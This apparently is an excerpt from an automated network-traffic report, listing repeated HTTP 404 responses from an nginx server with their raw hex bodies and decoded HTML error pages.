                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:32 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:33 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:36 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:37 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:39 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:41 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:43 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:47 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:32:48 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
